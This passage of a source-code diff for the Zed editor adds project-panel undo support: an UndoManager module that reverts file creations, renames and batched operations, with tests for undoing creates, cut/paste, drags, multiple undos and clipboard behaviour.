window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + select_path(&panel, "root", cx); + panel.update_in(cx, |panel, window, cx| { + panel.new_directory(&NewDirectory, window, cx) + }); + cx.run_until_parked(); + + let confirm = panel.update_in(cx, |panel, window, cx| { + panel + .filename_editor + .update(cx, |editor, cx| editor.set_text("new_dir", window, cx)); + panel.confirm_edit(true, window, cx).unwrap() + }); + confirm.await.unwrap(); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/new_dir", cx).is_some(), + "New directory should exist" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + find_project_entry(&panel, "root/new_dir", cx), + None, + "New directory should be removed after undo" + ); +} + +#[gpui::test] +async fn test_undo_cut_paste(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "src": { + "file.txt": "content", + }, + "dst": {}, + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + toggle_expand_dir(&panel, "root/src", cx); + + select_path_with_mark(&panel, "root/src/file.txt", cx); + panel.update_in(cx, |panel, window, cx| { + panel.cut(&Default::default(), window, cx); + }); + + select_path(&panel, "root/dst", 
cx); + panel.update_in(cx, |panel, window, cx| { + panel.paste(&Default::default(), window, cx); + }); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/dst/file.txt", cx).is_some(), + "File should be moved to dst" + ); + assert_eq!( + find_project_entry(&panel, "root/src/file.txt", cx), + None, + "File should no longer be in src" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/src/file.txt", cx).is_some(), + "File should be back in src after undo" + ); + assert_eq!( + find_project_entry(&panel, "root/dst/file.txt", cx), + None, + "File should no longer be in dst after undo" + ); +} + +#[gpui::test] +async fn test_undo_drag_single_entry(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "src": { + "main.rs": "", + }, + "dst": {}, + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + toggle_expand_dir(&panel, "root/src", cx); + + panel.update(cx, |panel, _| panel.marked_entries.clear()); + select_path_with_mark(&panel, "root/src/main.rs", cx); + drag_selection_to(&panel, "root/dst", false, cx); + + assert!( + find_project_entry(&panel, "root/dst/main.rs", cx).is_some(), + "File should be in dst after drag" + ); + assert_eq!( + find_project_entry(&panel, "root/src/main.rs", cx), + None, + "File should no longer be in src after drag" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert!( + 
find_project_entry(&panel, "root/src/main.rs", cx).is_some(), + "File should be back in src after undo" + ); + assert_eq!( + find_project_entry(&panel, "root/dst/main.rs", cx), + None, + "File should no longer be in dst after undo" + ); +} + +#[gpui::test] +async fn test_undo_drag_multiple_entries(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "src": { + "alpha.txt": "", + "beta.txt": "", + }, + "dst": {}, + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + toggle_expand_dir(&panel, "root/src", cx); + + panel.update(cx, |panel, _| panel.marked_entries.clear()); + select_path_with_mark(&panel, "root/src/alpha.txt", cx); + select_path_with_mark(&panel, "root/src/beta.txt", cx); + drag_selection_to(&panel, "root/dst", false, cx); + + assert!( + find_project_entry(&panel, "root/dst/alpha.txt", cx).is_some(), + "alpha.txt should be in dst after drag" + ); + assert!( + find_project_entry(&panel, "root/dst/beta.txt", cx).is_some(), + "beta.txt should be in dst after drag" + ); + + // A single undo should revert the entire batch + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/src/alpha.txt", cx).is_some(), + "alpha.txt should be back in src after undo" + ); + assert!( + find_project_entry(&panel, "root/src/beta.txt", cx).is_some(), + "beta.txt should be back in src after undo" + ); + assert_eq!( + find_project_entry(&panel, "root/dst/alpha.txt", cx), + None, + "alpha.txt should no longer be in dst after undo" 
+ ); + assert_eq!( + find_project_entry(&panel, "root/dst/beta.txt", cx), + None, + "beta.txt should no longer be in dst after undo" + ); +} + +#[gpui::test] +async fn test_multiple_sequential_undos(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "a.txt": "", + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + select_path(&panel, "root/a.txt", cx); + panel.update_in(cx, |panel, window, cx| panel.rename(&Rename, window, cx)); + cx.run_until_parked(); + let confirm = panel.update_in(cx, |panel, window, cx| { + panel + .filename_editor + .update(cx, |editor, cx| editor.set_text("b.txt", window, cx)); + panel.confirm_edit(true, window, cx).unwrap() + }); + confirm.await.unwrap(); + cx.run_until_parked(); + + assert!(find_project_entry(&panel, "root/b.txt", cx).is_some()); + + select_path(&panel, "root", cx); + panel.update_in(cx, |panel, window, cx| panel.new_file(&NewFile, window, cx)); + cx.run_until_parked(); + let confirm = panel.update_in(cx, |panel, window, cx| { + panel + .filename_editor + .update(cx, |editor, cx| editor.set_text("c.txt", window, cx)); + panel.confirm_edit(true, window, cx).unwrap() + }); + confirm.await.unwrap(); + cx.run_until_parked(); + + assert!(find_project_entry(&panel, "root/b.txt", cx).is_some()); + assert!(find_project_entry(&panel, "root/c.txt", cx).is_some()); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + find_project_entry(&panel, "root/c.txt", cx), + None, + "c.txt should be removed after 
first undo" + ); + assert!( + find_project_entry(&panel, "root/b.txt", cx).is_some(), + "b.txt should still exist after first undo" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/a.txt", cx).is_some(), + "a.txt should be restored after second undo" + ); + assert_eq!( + find_project_entry(&panel, "root/b.txt", cx), + None, + "b.txt should no longer exist after second undo" + ); +} + +#[gpui::test] +async fn test_undo_with_empty_stack(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "a.txt": "", + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/a.txt", cx).is_some(), + "File tree should be unchanged after undo on empty stack" + ); +} + +#[gpui::test] +async fn test_undo_batch(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "src": { + "main.rs": "// Code!" 
+ } + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + let worktree_id = project.update(cx, |project, cx| { + project.visible_worktrees(cx).next().unwrap().read(cx).id() + }); + cx.run_until_parked(); + + // Since there currently isn't a way to both create a folder and the file + // within it as two separate operations batched under the same + // `ProjectPanelOperation::Batch` operation, we'll simply record those + // ourselves, knowing that the filesystem already has the folder and file + // being provided in the operations. + panel.update(cx, |panel, _cx| { + panel.undo_manager.record_batch(vec![ + ProjectPanelOperation::Create { + project_path: ProjectPath { + worktree_id, + path: Arc::from(rel_path("src/main.rs")), + }, + }, + ProjectPanelOperation::Create { + project_path: ProjectPath { + worktree_id, + path: Arc::from(rel_path("src/")), + }, + }, + ]); + }); + + // Ensure that `src/main.rs` is present in the filesystem before proceeding, + // otherwise this test is irrelevant. 
+ assert_eq!(fs.files(), vec![PathBuf::from(path!("/root/src/main.rs"))]); + assert_eq!( + fs.directories(false), + vec![ + PathBuf::from(path!("/")), + PathBuf::from(path!("/root/")), + PathBuf::from(path!("/root/src/")) ] ); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert_eq!(fs.files().len(), 0); + assert_eq!( + fs.directories(false), + vec![PathBuf::from(path!("/")), PathBuf::from(path!("/root/"))] + ); } #[gpui::test] -async fn test_copy_paste_directory_with_sibling_file(cx: &mut gpui::TestAppContext) { +async fn test_paste_external_paths(cx: &mut gpui::TestAppContext) { init_test(cx); + set_auto_open_settings( + cx, + ProjectPanelAutoOpenSettings { + on_drop: Some(false), + ..Default::default() + }, + ); let fs = FakeFs::new(cx.executor()); fs.insert_tree( - "/test", + path!("/root"), json!({ - "dir1": { - "a.txt": "", - "b.txt": "", - }, - "dir2": {}, - "c.txt": "", - "d.txt": "", + "subdir": {} }), ) .await; - let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await; + fs.insert_tree( + path!("/external"), + json!({ + "new_file.rs": "fn main() {}" + }), + ) + .await; + + let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); let workspace = window .read_with(cx, |mw, _| mw.workspace().clone()) @@ -1792,107 +2580,43 @@ async fn test_copy_paste_directory_with_sibling_file(cx: &mut gpui::TestAppConte let panel = workspace.update_in(cx, ProjectPanel::new); cx.run_until_parked(); - toggle_expand_dir(&panel, "test/dir1", cx); - - cx.simulate_modifiers_change(gpui::Modifiers { - control: true, - ..Default::default() - }); - - select_path_with_mark(&panel, "test/dir1", cx); - select_path_with_mark(&panel, "test/c.txt", cx); - - assert_eq!( - visible_entries_as_strings(&panel, 0..15, cx), - &[ - "v test", - " v dir1 <== marked", - " a.txt", - " b.txt", - " > dir2", 
- " c.txt <== selected <== marked", - " d.txt", - ], - "Initial state before copying dir1 and c.txt" - ); - - panel.update_in(cx, |panel, window, cx| { - panel.copy(&Default::default(), window, cx); - }); - select_path(&panel, "test/dir2", cx); - panel.update_in(cx, |panel, window, cx| { - panel.paste(&Default::default(), window, cx); + cx.write_to_clipboard(ClipboardItem { + entries: vec![GpuiClipboardEntry::ExternalPaths(ExternalPaths( + smallvec::smallvec![PathBuf::from(path!("/external/new_file.rs"))], + ))], }); - cx.executor().run_until_parked(); - - toggle_expand_dir(&panel, "test/dir2/dir1", cx); - - assert_eq!( - visible_entries_as_strings(&panel, 0..15, cx), - &[ - "v test", - " v dir1 <== marked", - " a.txt", - " b.txt", - " v dir2", - " v dir1 <== selected", - " a.txt", - " b.txt", - " c.txt", - " c.txt <== marked", - " d.txt", - ], - "Should copy dir1 as well as c.txt into dir2" - ); - // Disambiguating multiple files should not open the rename editor. - select_path(&panel, "test/dir2", cx); + select_path(&panel, "root/subdir", cx); panel.update_in(cx, |panel, window, cx| { panel.paste(&Default::default(), window, cx); }); cx.executor().run_until_parked(); assert_eq!( - visible_entries_as_strings(&panel, 0..15, cx), + visible_entries_as_strings(&panel, 0..50, cx), &[ - "v test", - " v dir1 <== marked", - " a.txt", - " b.txt", - " v dir2", - " v dir1", - " a.txt", - " b.txt", - " > dir1 copy <== selected", - " c.txt", - " c copy.txt", - " c.txt <== marked", - " d.txt", + "v root", + " v subdir", + " new_file.rs <== selected", ], - "Should copy dir1 as well as c.txt into dir2 and disambiguate them without opening the rename editor" ); } #[gpui::test] -async fn test_copy_paste_nested_and_root_entries(cx: &mut gpui::TestAppContext) { +async fn test_copy_and_cut_write_to_system_clipboard(cx: &mut gpui::TestAppContext) { init_test(cx); let fs = FakeFs::new(cx.executor()); fs.insert_tree( - "/test", + path!("/root"), json!({ - "dir1": { - "a.txt": "", - 
"b.txt": "", - }, - "dir2": {}, - "c.txt": "", - "d.txt": "", + "file_a.txt": "", + "file_b.txt": "" }), ) .await; - let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await; + let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); let workspace = window .read_with(cx, |mw, _| mw.workspace().clone()) @@ -1901,58 +2625,32 @@ async fn test_copy_paste_nested_and_root_entries(cx: &mut gpui::TestAppContext) let panel = workspace.update_in(cx, ProjectPanel::new); cx.run_until_parked(); - toggle_expand_dir(&panel, "test/dir1", cx); - - cx.simulate_modifiers_change(gpui::Modifiers { - control: true, - ..Default::default() + select_path(&panel, "root/file_a.txt", cx); + panel.update_in(cx, |panel, window, cx| { + panel.copy(&Default::default(), window, cx); }); - select_path_with_mark(&panel, "test/dir1/a.txt", cx); - select_path_with_mark(&panel, "test/dir1", cx); - select_path_with_mark(&panel, "test/c.txt", cx); - - assert_eq!( - visible_entries_as_strings(&panel, 0..15, cx), - &[ - "v test", - " v dir1 <== marked", - " a.txt <== marked", - " b.txt", - " > dir2", - " c.txt <== selected <== marked", - " d.txt", - ], - "Initial state before copying a.txt, dir1 and c.txt" + let clipboard = cx + .read_from_clipboard() + .expect("clipboard should have content after copy"); + let text = clipboard.text().expect("clipboard should contain text"); + assert!( + text.contains("file_a.txt"), + "System clipboard should contain the copied file path, got: {text}" ); + select_path(&panel, "root/file_b.txt", cx); panel.update_in(cx, |panel, window, cx| { - panel.copy(&Default::default(), window, cx); - }); - select_path(&panel, "test/dir2", cx); - panel.update_in(cx, |panel, window, cx| { - panel.paste(&Default::default(), window, cx); + panel.cut(&Default::default(), window, cx); }); - cx.executor().run_until_parked(); - - toggle_expand_dir(&panel, 
"test/dir2/dir1", cx); - assert_eq!( - visible_entries_as_strings(&panel, 0..20, cx), - &[ - "v test", - " v dir1 <== marked", - " a.txt <== marked", - " b.txt", - " v dir2", - " v dir1 <== selected", - " a.txt", - " b.txt", - " c.txt", - " c.txt <== marked", - " d.txt", - ], - "Should copy dir1 and c.txt into dir2. a.txt is already present in copied dir1." + let clipboard = cx + .read_from_clipboard() + .expect("clipboard should have content after cut"); + let text = clipboard.text().expect("clipboard should contain text"); + assert!( + text.contains("file_b.txt"), + "System clipboard should contain the cut file path, got: {text}" ); } @@ -4412,6 +5110,90 @@ async fn test_drag_marked_entries_in_folded_directories(cx: &mut gpui::TestAppCo ); } +#[gpui::test] +async fn test_dragging_same_named_files_preserves_one_source_on_conflict( + cx: &mut gpui::TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "dir_a": { + "shared.txt": "from a" + }, + "dir_b": { + "shared.txt": "from b" + } + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |multi_workspace, _| multi_workspace.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + panel.update_in(cx, |panel, window, cx| { + let (root_entry_id, worktree_id, entry_a_id, entry_b_id) = { + let worktree = panel.project.read(cx).visible_worktrees(cx).next().unwrap(); + let worktree = worktree.read(cx); + let root_entry_id = worktree.root_entry().unwrap().id; + let worktree_id = worktree.id(); + let entry_a_id = worktree + .entry_for_path(rel_path("dir_a/shared.txt")) + .unwrap() + .id; + let entry_b_id = worktree + 
.entry_for_path(rel_path("dir_b/shared.txt")) + .unwrap() + .id; + (root_entry_id, worktree_id, entry_a_id, entry_b_id) + }; + + let drag = DraggedSelection { + active_selection: SelectedEntry { + worktree_id, + entry_id: entry_a_id, + }, + marked_selections: Arc::new([ + SelectedEntry { + worktree_id, + entry_id: entry_a_id, + }, + SelectedEntry { + worktree_id, + entry_id: entry_b_id, + }, + ]), + }; + + panel.drag_onto(&drag, root_entry_id, false, window, cx); + }); + cx.executor().run_until_parked(); + + let files = fs.files(); + assert!(files.contains(&PathBuf::from(path!("/root/shared.txt")))); + + let remaining_sources = [ + PathBuf::from(path!("/root/dir_a/shared.txt")), + PathBuf::from(path!("/root/dir_b/shared.txt")), + ] + .into_iter() + .filter(|path| files.contains(path)) + .count(); + + assert_eq!( + remaining_sources, 1, + "one conflicting source file should remain in place" + ); +} + #[gpui::test] async fn test_drag_entries_between_different_worktrees(cx: &mut gpui::TestAppContext) { init_test(cx); @@ -8586,6 +9368,55 @@ async fn test_compare_files_context_menu(cx: &mut gpui::TestAppContext) { } } +#[gpui::test] +async fn test_reveal_in_file_manager_path_falls_back_to_worktree_root( + cx: &mut gpui::TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "file.txt": "content", + "dir": {}, + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + select_path(&panel, "root/file.txt", cx); + let selected_reveal_path = panel + .update(cx, |panel, cx| panel.reveal_in_file_manager_path(cx)) + .expect("selected entry should 
produce a reveal path"); + assert!( + selected_reveal_path.ends_with(Path::new("file.txt")), + "Expected selected file path, got {:?}", + selected_reveal_path + ); + + panel.update(cx, |panel, _| { + panel.selection = None; + panel.marked_entries.clear(); + }); + let fallback_reveal_path = panel + .update(cx, |panel, cx| panel.reveal_in_file_manager_path(cx)) + .expect("project root should be used when selection is empty"); + assert!( + fallback_reveal_path.ends_with(Path::new("root")), + "Expected worktree root path, got {:?}", + fallback_reveal_path + ); +} + #[gpui::test] async fn test_hide_hidden_entries(cx: &mut gpui::TestAppContext) { init_test(cx); @@ -9593,11 +10424,11 @@ async fn run_create_file_in_folded_path_case( } } -fn init_test(cx: &mut TestAppContext) { +pub(crate) fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); crate::init(cx); cx.update_global::<SettingsStore, _>(|store, cx| { @@ -9615,7 +10446,7 @@ fn init_test_with_editor(cx: &mut TestAppContext) { cx.update(|cx| { let app_state = AppState::test(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); crate::init(cx); workspace::init(app_state, cx); diff --git a/crates/project_panel/src/undo.rs b/crates/project_panel/src/undo.rs new file mode 100644 index 0000000000000000000000000000000000000000..3a8baa23c55db8f3572174ee667196936e633281 --- /dev/null +++ b/crates/project_panel/src/undo.rs @@ -0,0 +1,286 @@ +use anyhow::anyhow; +use gpui::{AppContext, SharedString, Task, WeakEntity}; +use project::ProjectPath; +use std::collections::VecDeque; +use ui::{App, IntoElement, Label, ParentElement, Styled, v_flex}; +use workspace::{ + Workspace, + notifications::{NotificationId,
simple_message_notification::MessageNotification}, }; + +const MAX_UNDO_OPERATIONS: usize = 10_000; + +#[derive(Clone)] +pub enum ProjectPanelOperation { + Batch(Vec<ProjectPanelOperation>), + Create { + project_path: ProjectPath, + }, + Rename { + old_path: ProjectPath, + new_path: ProjectPath, + }, +} + +pub struct UndoManager { + workspace: WeakEntity<Workspace>, + stack: VecDeque<ProjectPanelOperation>, + /// Maximum number of operations to keep on the undo stack. + limit: usize, +} + +impl UndoManager { + pub fn new(workspace: WeakEntity<Workspace>) -> Self { + Self::new_with_limit(workspace, MAX_UNDO_OPERATIONS) + } + + pub fn new_with_limit(workspace: WeakEntity<Workspace>, limit: usize) -> Self { + Self { + workspace, + limit, + stack: VecDeque::new(), + } + } + + pub fn can_undo(&self) -> bool { + !self.stack.is_empty() + } + + pub fn undo(&mut self, cx: &mut App) { + if let Some(operation) = self.stack.pop_back() { + let task = self.revert_operation(operation, cx); + let workspace = self.workspace.clone(); + + cx.spawn(async move |cx| { + let errors = task.await; + if !errors.is_empty() { + cx.update(|cx| { + let messages = errors + .iter() + .map(|err| SharedString::from(err.to_string())) + .collect(); + + Self::show_errors(workspace, messages, cx) + }) + } + }) + .detach(); + } + } + + pub fn record(&mut self, operation: ProjectPanelOperation) { + if self.stack.len() >= self.limit { + self.stack.pop_front(); + } + + self.stack.push_back(operation); + } + + pub fn record_batch(&mut self, operations: impl IntoIterator<Item = ProjectPanelOperation>) { + let mut operations = operations.into_iter().collect::<Vec<_>>(); + let operation = match operations.len() { + 0 => return, + 1 => operations.pop().unwrap(), + _ => ProjectPanelOperation::Batch(operations), + }; + + self.record(operation); + } + + /// Attempts to revert the provided `operation`, returning a vector of errors + /// in case there was any failure while reverting the operation. + /// + /// For all operations other than [`crate::undo::ProjectPanelOperation::Batch`], a maximum + /// of one error is returned.
+ fn revert_operation( + &self, + operation: ProjectPanelOperation, + cx: &mut App, + ) -> Task> { + match operation { + ProjectPanelOperation::Create { project_path } => { + let Some(workspace) = self.workspace.upgrade() else { + return Task::ready(vec![anyhow!("Failed to obtain workspace.")]); + }; + + let result = workspace.update(cx, |workspace, cx| { + workspace.project().update(cx, |project, cx| { + let entry_id = project + .entry_for_path(&project_path, cx) + .map(|entry| entry.id) + .ok_or_else(|| anyhow!("No entry for path."))?; + + project + .delete_entry(entry_id, true, cx) + .ok_or_else(|| anyhow!("Failed to trash entry.")) + }) + }); + + let task = match result { + Ok(task) => task, + Err(err) => return Task::ready(vec![err]), + }; + + cx.spawn(async move |_| match task.await { + Ok(_) => vec![], + Err(err) => vec![err], + }) + } + ProjectPanelOperation::Rename { old_path, new_path } => { + let Some(workspace) = self.workspace.upgrade() else { + return Task::ready(vec![anyhow!("Failed to obtain workspace.")]); + }; + + let result = workspace.update(cx, |workspace, cx| { + workspace.project().update(cx, |project, cx| { + let entry_id = project + .entry_for_path(&new_path, cx) + .map(|entry| entry.id) + .ok_or_else(|| anyhow!("No entry for path."))?; + + Ok(project.rename_entry(entry_id, old_path.clone(), cx)) + }) + }); + + let task = match result { + Ok(task) => task, + Err(err) => return Task::ready(vec![err]), + }; + + cx.spawn(async move |_| match task.await { + Ok(_) => vec![], + Err(err) => vec![err], + }) + } + ProjectPanelOperation::Batch(operations) => { + // When reverting operations in a batch, we reverse the order of + // operations to handle dependencies between them. For example, + // if a batch contains the following order of operations: + // + // 1. Create `src/` + // 2. Create `src/main.rs` + // + // If we first try to revert the directory creation, it would + // fail because there's still files inside the directory. 
+ // Operations are also reverted sequentially in order to avoid + // this same problem. + let tasks: Vec<_> = operations + .into_iter() + .rev() + .map(|operation| self.revert_operation(operation, cx)) + .collect(); + + cx.spawn(async move |_| { + let mut errors = Vec::new(); + for task in tasks { + errors.extend(task.await); + } + errors + }) + } + } + } + + /// Displays a notification with the list of provided errors ensuring that, + /// when more than one error is provided, which can be the case when dealing + /// with undoing a [`crate::undo::ProjectPanelOperation::Batch`], a list is + /// displayed with each of the errors, instead of a single message. + fn show_errors(workspace: WeakEntity, messages: Vec, cx: &mut App) { + workspace + .update(cx, move |workspace, cx| { + let notification_id = + NotificationId::Named(SharedString::new_static("project_panel_undo")); + + workspace.show_notification(notification_id, cx, move |cx| { + cx.new(|cx| { + if let [err] = messages.as_slice() { + MessageNotification::new(err.to_string(), cx) + .with_title("Failed to undo Project Panel Operation") + } else { + MessageNotification::new_from_builder(cx, move |_, _| { + v_flex() + .gap_1() + .children( + messages + .iter() + .map(|message| Label::new(format!("- {message}"))), + ) + .into_any_element() + }) + .with_title("Failed to undo Project Panel Operations") + } + }) + }) + }) + .ok(); + } +} + +#[cfg(test)] +mod test { + use crate::{ + ProjectPanel, project_panel_tests, + undo::{ProjectPanelOperation, UndoManager}, + }; + use gpui::{Entity, TestAppContext, VisualTestContext}; + use project::{FakeFs, Project, ProjectPath}; + use std::sync::Arc; + use util::rel_path::rel_path; + use workspace::MultiWorkspace; + + struct TestContext { + project: Entity, + panel: Entity, + } + + async fn init_test(cx: &mut TestAppContext) -> TestContext { + project_panel_tests::init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs.clone(), 
["/root".as_ref()], cx).await; + let window = + cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + TestContext { project, panel } + } + + #[gpui::test] + async fn test_limit(cx: &mut TestAppContext) { + let test_context = init_test(cx).await; + let worktree_id = test_context.project.update(cx, |project, cx| { + project.visible_worktrees(cx).next().unwrap().read(cx).id() + }); + + let build_create_operation = |file_name: &str| ProjectPanelOperation::Create { + project_path: ProjectPath { + path: Arc::from(rel_path(file_name)), + worktree_id, + }, + }; + + // Since we're updating the `ProjectPanel`'s undo manager with one whose + // limit is 3 operations, we only need to create 4 operations which + // we'll record, in order to confirm that the oldest operation is + // evicted. 
+ let operation_a = build_create_operation("file_a.txt"); + let operation_b = build_create_operation("file_b.txt"); + let operation_c = build_create_operation("file_c.txt"); + let operation_d = build_create_operation("file_d.txt"); + + test_context.panel.update(cx, move |panel, _cx| { + panel.undo_manager = UndoManager::new_with_limit(panel.workspace.clone(), 3); + panel.undo_manager.record(operation_a); + panel.undo_manager.record(operation_b); + panel.undo_manager.record(operation_c); + panel.undo_manager.record(operation_d); + + assert_eq!(panel.undo_manager.stack.len(), 3); + }); + } +} diff --git a/crates/project_symbols/Cargo.toml b/crates/project_symbols/Cargo.toml index 83e3cb587d46a5bddf1c8b30c593c18a9b131ad2..da23116e83b465a3ad1aace883d2abb15ad9aa9b 100644 --- a/crates/project_symbols/Cargo.toml +++ b/crates/project_symbols/Cargo.toml @@ -23,6 +23,7 @@ project.workspace = true serde_json.workspace = true settings.workspace = true theme.workspace = true +theme_settings.workspace = true util.workspace = true workspace.workspace = true diff --git a/crates/project_symbols/src/project_symbols.rs b/crates/project_symbols/src/project_symbols.rs index d62935ab3819d2e6857c233a863af434f60f93a3..931e332d93d869bc31909643190d5b35f32409dc 100644 --- a/crates/project_symbols/src/project_symbols.rs +++ b/crates/project_symbols/src/project_symbols.rs @@ -9,7 +9,8 @@ use picker::{Picker, PickerDelegate}; use project::{Project, Symbol, lsp_store::SymbolLocation}; use settings::Settings; use std::{cmp::Reverse, sync::Arc}; -use theme::{ActiveTheme, ThemeSettings}; +use theme::ActiveTheme; +use theme_settings::ThemeSettings; use util::ResultExt; use workspace::{ Workspace, @@ -139,11 +140,20 @@ impl PickerDelegate for ProjectSymbolsDelegate { ); editor.update(cx, |editor, cx| { + let multibuffer_snapshot = editor.buffer().read(cx).snapshot(cx); + let Some(buffer_snapshot) = multibuffer_snapshot.as_singleton() else { + return; + }; + let text_anchor = 
